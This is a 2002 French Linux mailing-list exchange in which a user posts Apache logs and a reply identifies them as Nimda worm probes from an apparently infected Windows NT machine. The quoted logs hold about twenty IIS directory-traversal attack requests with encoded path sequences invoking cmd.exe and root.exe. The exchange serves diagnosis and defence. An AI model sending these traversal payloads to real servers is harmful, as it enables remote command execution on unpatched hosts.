Non, pas de probleme sous Linux! Il s'agit en fait du vers Nimda qui essaye de t'infecter...
Bref, il y a beaucoup de chance pour que la machine 213.118.188.55 soit un NT infecté. Rudi CORNELY Nicolas a écrit : > > Désolé de vous balancer un post aussi énorme mais quelqu'un serait-il en > mesure de me dire si ces logs [Apache] ont quelque chose d'inquiétant? > > 213.118.188.55 - - [07/Feb/2002:17:49:53 +0100] "GET /scripts/root.exe?/c+dir > HTTP/1.0" 404 278 > 213.118.188.55 - - [07/Feb/2002:17:49:57 +0100] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 276 > 213.118.188.55 - - [07/Feb/2002:17:50:08 +0100] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 > 213.118.188.55 - - [07/Feb/2002:17:50:12 +0100] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 > 213.118.188.55 - - [07/Feb/2002:18:07:21 +0100] "GET /scripts/root.exe?/c+dir > HTTP/1.0" 404 278 > 213.118.188.55 - - [07/Feb/2002:18:48:51 +0100] "GET /scripts/root.exe?/c+dir > HTTP/1.0" 404 278 > 213.118.188.55 - - [07/Feb/2002:18:48:53 +0100] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 276 > 213.118.188.55 - - [07/Feb/2002:18:49:03 +0100] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 > 213.118.188.55 - - [07/Feb/2002:18:49:04 +0100] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286 > 213.118.188.55 - - [07/Feb/2002:18:49:06 +0100] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 > 213.118.188.55 - - [07/Feb/2002:18:49:08 +0100] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 317 > 213.118.188.55 - - [07/Feb/2002:18:49:09 +0100] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 317 > 213.118.188.55 - - [07/Feb/2002:18:49:10 +0100] "GET > >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 333 > 213.118.188.55 - - [07/Feb/2002:18:49:15 +0100] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 > 213.118.188.55 - - [07/Feb/2002:18:49:17 +0100] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 > 213.118.188.55 - - [07/Feb/2002:18:49:19 +0100] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 > 213.118.188.55 - - [07/Feb/2002:18:49:20 +0100] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 > 213.118.188.55 - - [07/Feb/2002:18:49:22 +0100] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 > 213.118.188.55 - - [07/Feb/2002:18:49:24 +0100] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 > 213.118.188.55 - - [07/Feb/2002:18:49:28 +0100] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 > -- > =============== > CORNELY Nicolas > =============== > _______________________________________________ > Linux Mailing List > Archives: http://unixtech.be/mailman/listinfo/linux
